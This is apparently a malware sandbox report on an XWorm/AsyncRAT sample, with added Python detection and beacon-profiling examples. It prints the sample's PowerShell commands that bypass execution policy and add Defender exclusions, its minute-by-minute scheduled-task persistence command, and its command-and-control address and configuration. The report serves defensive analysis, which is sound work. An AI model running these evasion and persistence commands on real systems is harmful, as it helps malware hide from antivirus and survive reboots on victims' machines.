
Windows Analysis Report
5q4X9fRo4b.exe

Overview

General Information

Sample name: 5q4X9fRo4b.exe (renamed because the original name is a hash value)
Original sample name: af9ce09585744c97e4c856c8e6124d8a842714dfd5101e27eaff721220679802.exe
Analysis ID: 1530274
MD5: 9425780161c1cb105cd206d3f4fc6fa8
SHA1: 20608510ef22b09e5e874268b61d726ac0218c45
SHA256: af9ce09585744c97e4c856c8e6124d8a842714dfd5101e27eaff721220679802
Tags: exe, user-Chainskilabs

Detection

AsyncRAT, XWorm
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AsyncRAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 5q4X9fRo4b.exe (PID: 1408 cmdline: "C:\Users\user\Desktop\5q4X9fRo4b.exe" MD5: 9425780161C1CB105CD206D3F4FC6FA8)
    • powershell.exe (PID: 6408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7364 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '5q4X9fRo4b.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SystemUser32.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7880 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SystemUser32.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 8116 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser32" /tr "C:\Users\user\AppData\Roaming\SystemUser32.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • SystemUser32.exe (PID: 8164 cmdline: C:\Users\user\AppData\Roaming\SystemUser32.exe MD5: 9425780161C1CB105CD206D3F4FC6FA8)
  • SystemUser32.exe (PID: 1916 cmdline: "C:\Users\user\AppData\Roaming\SystemUser32.exe" MD5: 9425780161C1CB105CD206D3F4FC6FA8)
  • SystemUser32.exe (PID: 1316 cmdline: C:\Users\user\AppData\Roaming\SystemUser32.exe MD5: 9425780161C1CB105CD206D3F4FC6FA8)
  • SystemUser32.exe (PID: 3020 cmdline: "C:\Users\user\AppData\Roaming\SystemUser32.exe" MD5: 9425780161C1CB105CD206D3F4FC6FA8)
Extracted malware configuration (XWorm):
{"C2 url": ["147.185.221.17"], "Port": "10406", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Yara matches (Source | Rule | Description | Author, followed by matched strings where the rule reports them)

Sample file
  • 5q4X9fRo4b.exe | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
  • 5q4X9fRo4b.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
  • 5q4X9fRo4b.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
  • 5q4X9fRo4b.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
      0x83ba:$s6: VirtualBox
      0x8318:$s8: Win32_ComputerSystem
      0x8d80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      0x8e1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      0x8f32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      0x89f8:$cnc4: POST / HTTP/1.1

Dropped file (the same four rules match at the same offsets, consistent with the dropped copy being byte-identical to the sample: both carry MD5 9425780161c1cb105cd206d3f4fc6fa8 in the process tree)
  • C:\Users\user\AppData\Roaming\SystemUser32.exe | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
  • C:\Users\user\AppData\Roaming\SystemUser32.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
  • C:\Users\user\AppData\Roaming\SystemUser32.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
  • C:\Users\user\AppData\Roaming\SystemUser32.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
      0x83ba:$s6: VirtualBox
      0x8318:$s8: Win32_ComputerSystem
      0x8d80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      0x8e1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      0x8f32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      0x89f8:$cnc4: POST / HTTP/1.1

Memory dumps
  • 00000000.00000002.2502473225.0000000002F8A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
  • 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
  • 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
  • 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
      0x81ba:$s6: VirtualBox
      0x8118:$s8: Win32_ComputerSystem
      0x8b80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      0x8c1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      0x8d32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      0x87f8:$cnc4: POST / HTTP/1.1
  • 00000000.00000002.2502473225.0000000002F41000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
  • (1 further memory-dump entry not expanded in the report)

Unpacked PE
  • 0.0.5q4X9fRo4b.exe.d30000.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
  • 0.0.5q4X9fRo4b.exe.d30000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
  • 0.0.5q4X9fRo4b.exe.d30000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
  • 0.0.5q4X9fRo4b.exe.d30000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
      0x83ba:$s6: VirtualBox
      0x8318:$s8: Win32_ComputerSystem
      0x8d80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      0x8e1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      0x8f32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      0x89f8:$cnc4: POST / HTTP/1.1

                            System Summary

Sigma rule matches

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\5q4X9fRo4b.exe", ParentImage: C:\Users\user\Desktop\5q4X9fRo4b.exe, ParentProcessId: 1408, ParentProcessName: 5q4X9fRo4b.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe', ProcessId: 6408, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\5q4X9fRo4b.exe", ParentImage: C:\Users\user\Desktop\5q4X9fRo4b.exe, ParentProcessId: 1408, ParentProcessName: 5q4X9fRo4b.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe', ProcessId: 6408, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\SystemUser32.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\5q4X9fRo4b.exe, ProcessId: 1408, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemUser32
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\5q4X9fRo4b.exe", ParentImage: C:\Users\user\Desktop\5q4X9fRo4b.exe, ParentProcessId: 1408, ParentProcessName: 5q4X9fRo4b.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe', ProcessId: 6408, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\5q4X9fRo4b.exe, ProcessId: 1408, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemUser32.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser32" /tr "C:\Users\user\AppData\Roaming\SystemUser32.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser32" /tr "C:\Users\user\AppData\Roaming\SystemUser32.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\5q4X9fRo4b.exe", ParentImage: C:\Users\user\Desktop\5q4X9fRo4b.exe, ParentProcessId: 1408, ParentProcessName: 5q4X9fRo4b.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser32" /tr "C:\Users\user\AppData\Roaming\SystemUser32.exe", ProcessId: 8116, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\5q4X9fRo4b.exe", ParentImage: C:\Users\user\Desktop\5q4X9fRo4b.exe, ParentProcessId: 1408, ParentProcessName: 5q4X9fRo4b.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe', ProcessId: 6408, ProcessName: powershell.exe
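The process tree and the Sigma matches above describe one small, reproducible chain: four PowerShell children of the sample that each bypass the execution policy and add a Defender exclusion (by path, then by process name, for both the original file and the dropped copy), followed by a scheduled task that relaunches the dropped binary from %AppData% every minute at the highest run level. The block below is an added example, not Joe Sandbox code and not the Sigma rules themselves: it encodes the intent of those matches as Python checks over process-creation events, with the events transcribed from the report's command lines (constructed input, plus one benign PowerShell invocation as a control). The prefix forms of -ExecutionPolicy (-ex, -ep, -exec) and the user-writable directory list are my own generalisation, not something the report states.

```python
"""Sigma-style checks over process-creation events for the chain seen in the
report: Add-MpPreference exclusions, -ExecutionPolicy Bypass, and a schtasks
entry that runs a binary from %AppData% every minute with /RL HIGHEST.
Added example; events are constructed from the report's process tree."""
import re
from dataclasses import dataclass

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE = r"C:\Users\user\Desktop\5q4X9fRo4b.exe"
DROPPED = r"C:\Users\user\AppData\Roaming\SystemUser32.exe"
CONHOST = r"C:\Windows\system32\conhost.exe"
SCHTASKS = r"C:\Windows\System32\schtasks.exe"

# Constructed events: (pid, image, parent image, command line), transcribed from
# the report's process tree, plus one benign control (pid 9001, made up here).
SAMPLE_EVENTS = [
    (6408, PS, SAMPLE, f'"{PS}" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath ' + f"'{SAMPLE}'"),
    (6368, CONHOST, PS, f"{CONHOST} 0xffffffff -ForceV1"),
    (7364, PS, SAMPLE, f'"{PS}" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess ' + "'5q4X9fRo4b.exe'"),
    (7652, PS, SAMPLE, f'"{PS}" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath ' + f"'{DROPPED}'"),
    (7880, PS, SAMPLE, f'"{PS}" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess ' + "'SystemUser32.exe'"),
    (8116, SCHTASKS, SAMPLE, f'"{SCHTASKS}" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser32" /tr "{DROPPED}"'),
    (8164, DROPPED, SAMPLE, DROPPED),
    (9001, PS, r"C:\Windows\explorer.exe", f'"{PS}" -NoProfile -Command Get-Date'),
]

# Add-/Set-MpPreference followed by any -Exclusion* parameter.
EXCLUSION_RE = re.compile(r"\b(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Process|Extension|IpAddress)\b", re.I)
# powershell.exe accepts unambiguous prefixes of -ExecutionPolicy (assumed list).
EP_BYPASS_RE = re.compile(r"-(?:ExecutionPolicy|exec|ex|ep)\s+(?:Bypass|Unrestricted)\b", re.I)
TASK_RUN_RE = re.compile(r'/tr\s+"?([^"]+?)"?(?:\s|$)', re.I)
TASK_MINUTE_RE = re.compile(r"/sc\s+minute\s+/mo\s+(\d+)", re.I)
# Directories a standard user can write to (assumption; extend for your estate).
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(events):
    """Return one Finding per (rule, event) that matches."""
    findings = []
    for pid, image, parent, cmdline in events:
        exe = basename(image)
        if exe == "powershell.exe":
            m = EXCLUSION_RE.search(cmdline)
            if m:
                findings.append(Finding("defender_exclusion_added", pid, m.group(0)))
            if EP_BYPASS_RE.search(cmdline):
                findings.append(Finding("execution_policy_bypass", pid, f"parent {basename(parent)}"))
        elif exe == "schtasks.exe" and "/create" in cmdline.lower():
            run = TASK_RUN_RE.search(cmdline)
            target = run.group(1) if run else ""
            reasons = []
            if any(d in target.lower() for d in USER_WRITABLE):
                reasons.append(f"task runs from user-writable path {target}")
            minute = TASK_MINUTE_RE.search(cmdline)
            if minute and int(minute.group(1)) <= 5:
                reasons.append(f"repeats every {minute.group(1)} minute(s)")
            if re.search(r"/RL\s+HIGHEST", cmdline, re.I):
                reasons.append("requests highest run level")
            if reasons:
                findings.append(Finding("suspicious_scheduled_task", pid, "; ".join(reasons)))
    return findings


def flagged_pids(events):
    return sorted({f.pid for f in evaluate(events)})


if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        print(f"{f.rule:28} pid={f.pid:<5} {f.detail}")
```

Each powershell.exe event in the tree yields two findings (exclusion plus policy bypass), the schtasks event yields one with all three reasons, and conhost.exe, the dropped binary's own launch and the benign control yield none. In production the same logic belongs in the SIEM as the matched Sigma rules; the point of the example is that the process tree alone, without any network data, is enough to convict this chain.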
Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol)

SID 2852870
2024-10-09T23:05:13.613687+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.17 | 10406 | 192.168.2.7 | 49933 | TCP
2024-10-09T23:05:14.081790+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.17 | 10406 | 192.168.2.7 | 49933 | TCP
2024-10-09T23:05:26.994236+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.17 | 10406 | 192.168.2.7 | 49933 | TCP
2024-10-09T23:05:39.903187+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.17 | 10406 | 192.168.2.7 | 49933 | TCP
2024-10-09T23:05:43.622791+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.17 | 10406 | 192.168.2.7 | 49933 | TCP
2024-10-09T23:05:52.835200+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.17 | 10406 | 192.168.2.7 | 49933 | TCP
2024-10-09T23:06:05.732794+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.17 | 10406 | 192.168.2.7 | 49933 | TCP
2024-10-09T23:06:13.629708+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.17 | 10406 | 192.168.2.7 | 49933 | TCP
2024-10-09T23:06:14.794101+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 147.185.221.17 | 10406 | 192.168.2.7 | 49933 | TCP

SID 2852923
2024-10-09T23:05:14.091945+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49933 | 147.185.221.17 | 10406 | TCP
2024-10-09T23:05:26.995996+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49933 | 147.185.221.17 | 10406 | TCP
2024-10-09T23:05:39.905710+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49933 | 147.185.221.17 | 10406 | TCP
2024-10-09T23:05:52.837470+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49933 | 147.185.221.17 | 10406 | TCP
2024-10-09T23:06:05.734423+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49933 | 147.185.221.17 | 10406 | TCP
2024-10-09T23:06:14.794890+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49933 | 147.185.221.17 | 10406 | TCP

SID 2852874
2024-10-09T23:05:13.613687+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 147.185.221.17 | 10406 | 192.168.2.7 | 49933 | TCP
2024-10-09T23:05:43.622791+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 147.185.221.17 | 10406 | 192.168.2.7 | 49933 | TCP
2024-10-09T23:06:13.629708+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 147.185.221.17 | 10406 | 192.168.2.7 | 49933 | TCP

SID 2855924
2024-10-09T23:05:13.801889+0200 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49933 | 147.185.221.17 | 10406 | TCP
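The alert tables above are all on one TCP session (192.168.2.7:49933 to 147.185.221.17:10406, the C2 and port from the extracted configuration), but the different SIDs carry different cadences: the server-side PING rule fires at 30-second spacing, the client check-in rule at roughly 13-second spacing, while the generic prefix-bytes rule fires on both and so looks irregular. The block below is an added example, not part of the Joe Sandbox report: it transcribes the alert rows as constructed input, computes inter-alert gaps per SID, and scores each SID for periodicity with a median-based heuristic (tolerance and threshold are my own choices, not the report's), and it recovers the external peer from the rows with the ipaddress module.

```python
"""Beacon-cadence profiling over the Suricata alerts from the report.
Added example; ALERTS is transcribed from the report's alert tables and the
periodicity heuristic is the author's own, not Suricata's or Joe Sandbox's."""
import ipaddress
from collections import defaultdict
from datetime import datetime
from statistics import median

C2 = "147.185.221.17"
VICTIM = "192.168.2.7"

# Constructed from the report: (timestamp, SID, src ip, src port, dst ip, dst port).
ALERTS = [
    ("2024-10-09T23:05:13.613687+0200", 2852870, C2, 10406, VICTIM, 49933),
    ("2024-10-09T23:05:13.613687+0200", 2852874, C2, 10406, VICTIM, 49933),
    ("2024-10-09T23:05:13.801889+0200", 2855924, VICTIM, 49933, C2, 10406),
    ("2024-10-09T23:05:14.081790+0200", 2852870, C2, 10406, VICTIM, 49933),
    ("2024-10-09T23:05:14.091945+0200", 2852923, VICTIM, 49933, C2, 10406),
    ("2024-10-09T23:05:26.994236+0200", 2852870, C2, 10406, VICTIM, 49933),
    ("2024-10-09T23:05:26.995996+0200", 2852923, VICTIM, 49933, C2, 10406),
    ("2024-10-09T23:05:39.903187+0200", 2852870, C2, 10406, VICTIM, 49933),
    ("2024-10-09T23:05:39.905710+0200", 2852923, VICTIM, 49933, C2, 10406),
    ("2024-10-09T23:05:43.622791+0200", 2852870, C2, 10406, VICTIM, 49933),
    ("2024-10-09T23:05:43.622791+0200", 2852874, C2, 10406, VICTIM, 49933),
    ("2024-10-09T23:05:52.835200+0200", 2852870, C2, 10406, VICTIM, 49933),
    ("2024-10-09T23:05:52.837470+0200", 2852923, VICTIM, 49933, C2, 10406),
    ("2024-10-09T23:06:05.732794+0200", 2852870, C2, 10406, VICTIM, 49933),
    ("2024-10-09T23:06:05.734423+0200", 2852923, VICTIM, 49933, C2, 10406),
    ("2024-10-09T23:06:13.629708+0200", 2852870, C2, 10406, VICTIM, 49933),
    ("2024-10-09T23:06:13.629708+0200", 2852874, C2, 10406, VICTIM, 49933),
    ("2024-10-09T23:06:14.794101+0200", 2852870, C2, 10406, VICTIM, 49933),
    ("2024-10-09T23:06:14.794890+0200", 2852923, VICTIM, 49933, C2, 10406),
]

SID_NAMES = {  # rule titles as given in the report's Networking section
    2852870: "XWorm CnC Checkin - Generic Prefix Bytes",
    2852874: "XWorm CnC PING Command Inbound M2",
    2852923: "XWorm CnC Checkin - Generic Prefix Bytes (Client)",
    2855924: "XWorm V3 CnC Command - PING Outbound",
}


def parse_ts(s):
    # %z accepts the "+0200" form used in the report.
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S.%f%z")


def times_by_sid(alerts):
    by_sid = defaultdict(list)
    for ts, sid, *_ in alerts:
        by_sid[sid].append(parse_ts(ts))
    return by_sid


def intervals(times):
    times = sorted(times)
    return [(b - a).total_seconds() for a, b in zip(times, times[1:])]


def beacon_profile(times, tolerance=0.10, min_gaps=2):
    """Median-based periodicity score: fraction of gaps within +/-tolerance of
    the median gap. Returns None when there are too few gaps to judge."""
    gaps = intervals(times)
    if len(gaps) < min_gaps:
        return None
    med = median(gaps)
    regular = sum(1 for g in gaps if abs(g - med) <= tolerance * med) / len(gaps)
    return {"events": len(times), "median_interval": med,
            "regular_fraction": regular, "periodic": regular >= 0.75}


def external_peers(alerts):
    """Non-RFC1918 (ip, port) endpoints seen in the alerts, i.e. C2 candidates."""
    peers = set()
    for _, _, sip, sport, dip, dport in alerts:
        for ip, port in ((sip, sport), (dip, dport)):
            if not ipaddress.ip_address(ip).is_private:
                peers.add((ip, port))
    return peers


def report(alerts):
    return {sid: beacon_profile(times) for sid, times in times_by_sid(alerts).items()}


if __name__ == "__main__":
    for sid, prof in report(ALERTS).items():
        print(sid, SID_NAMES.get(sid, "?"), prof)
    print("external peers:", external_peers(ALERTS))
```

Run on the transcribed rows, the inbound PING rule (2852874) profiles as perfectly regular at about 30 s, the client check-in rule (2852923) as regular at about 12.9 s with one shorter gap (the last check-in arrives about 9 s after the previous one), and the generic rule (2852870) as non-periodic because it mixes both streams; the single 2855924 alert gives no profile. The practical lesson is to profile per rule or per direction, not per session, before calling something a beacon.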


                            AV Detection

Source: 5q4X9fRo4b.exe | Avira: detected
